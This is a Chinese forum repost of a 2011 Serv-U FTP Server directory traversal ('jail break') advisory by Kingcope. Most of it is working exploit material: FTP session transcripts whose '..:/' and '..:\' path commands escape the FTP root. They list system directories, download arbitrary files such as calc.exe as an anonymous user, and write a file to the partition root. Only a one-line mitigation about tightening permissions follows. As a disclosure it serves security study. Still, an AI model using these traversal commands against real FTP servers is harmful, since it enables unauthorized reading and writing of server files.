• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 登录 立即注册
    • 切换风格
    快捷导航
    福建二哥 门户 查看主题

    Serv-U FTP Jail Break(越权遍历目录、下载任意文件)

    发布者: 涵韵 | 发布时间: 2025-6-27 15:41| 查看数: 70| 评论数: 0|帖子模式

    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    复制代码代码如下:
  • ----------------------------------------------------

  • Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
  • ----------------------------------------------------

  • /*
    sebug.net
    通过构造..:/来遍历服务器目录,下载任意文件
    影响版本:6.4,7.1,7.3,8.2,10.5
    */
    Affected:
    220 Serv-U FTP Server v7.3 ready...
    220 Serv-U FTP Server v7.1 ready...
    220 Serv-U FTP Server v6.4 ready...
    220 Serv-U FTP Server v8.2 ready...
    220 Serv-U FTP Server v10.5 ready...
  • ----------------------------------------------------

  • C:\Users\kingcope\Desktop>ftp 192.168.133.134
    Verbindung mit 192.168.133.134 wurde hergestellt.
    220 Serv-U FTP Server v6.4 for WinSock ready...
    Benutzer (192.168.133.134none)): ftp (anonymous user :>)
    331 User name okay, please send complete E-mail address as password.
    Kennwort:
    230 User logged in, proceed.
    ftp> cd "/..:/..:/..:/..:/program files"
    250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
    ftp> ls -la
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    dr--r--r-- 1 user group 0 Nov 12 21:48 .
    dr--r--r-- 1 user group 0 Nov 12 21:48 ..
    drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio
    n
    drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
    drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
    drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
    drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
    d--------- 1 user group 0 Jul 8 16:12 InstallShield
    Installation Information
    drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
    drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
    drw-rw-rw- 1 user group 0 Feb 12 2011 Java
    drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
    drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
    drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
    drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
    drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
    d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
    drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
    drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
    drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
    drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
    d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
    226 Transfer complete.
    FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
    ftp>
  • ----------------------------------------------------

  • with write perms:
    ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
  • ----------------------------------------------------

  • and as anonymous ftp:
    ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
    200 PORT Command successful.
    150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
    226 Transfer complete.
    FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
  • ----------------------------------------------------

  • This works to!!! :
    220 Serv-U FTP Server v7.3 ready...
    Benutzer (xx.xx.xx.xxnone)): ftp
    331 User name okay, please send complete E-mail address as password.
    Kennwort:
    230 User logged in, proceed.
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    .
    ..
    AUTOEXEC.BAT
    boot.ini
    bootfont.bin
    bsmain_runtime.log
    CONFIG.SYS
    Documents and Settings
    FPSE_search
    Inetpub
    IO.SYS
    log
    MSDOS.SYS
    msizap.exe
    MSOCache
    mysql
    NTDETECT.COM
    ntldr
    Program Files
    RavBin
    RECYCLER
    Replay.log
    rising.ini
    System Volume Information
    TDDOWNLOAD
    WCH.CN
    WINDOWS
    wmpub
    226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
    FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
  • ----------------------------------------------------

  • Sometimes you need to give it the path:
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    .
    ..
    360
    Adobe
    ASP.NET
    CCProxy
    CE Remote Tools
    cmak
    Common Files
    ComPlus Applications
    D-Tools
    FFTPServer
    HTML Help Workshop
    IISServer
    InstallShield Installation Information
    Intel
    Internet Explorer
    Java
    JavaSoft
    K-Lite Codec Pack
    Microsoft ActiveSync
    Microsoft Analysis Services
    Microsoft Device Emulator
    Microsoft MapPoint Web Service Samples
    Microsoft MapPoint Web Service SDK, Version 4.0
    Microsoft Office
    Microsoft Office Servers
    Microsoft Silverlight
    Microsoft SQL Server
    Microsoft Visual SourceSafe
    Microsoft Visual Studio 8
    Microsoft.NET
    MSBuild
    MSXML 6.0
    NetMeeting
    Outlook Express
    PortMap1.61
    Reference Assemblies
    Rising
    SQLXML 4.0
    SQLyog Enterprise
    STS2Setup_2052
    Symantec
    Thunder Network
    TSingVision
    Uninstall Information
    Windows Media Player
    Windows NT
    WindowsUpdate
    WinRAR
    226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
    FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
    ftp>

    @Sebug.net [ 2011-12-01 ]
    脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。

    来源:https://www.jb51.net/hack/41307.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
    		•

    最新评论

    浏览过的版块

    新人须知

    常见问题

    维权申诉

    关注微博

    扫描微信

    关于合作

    通讯联系

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表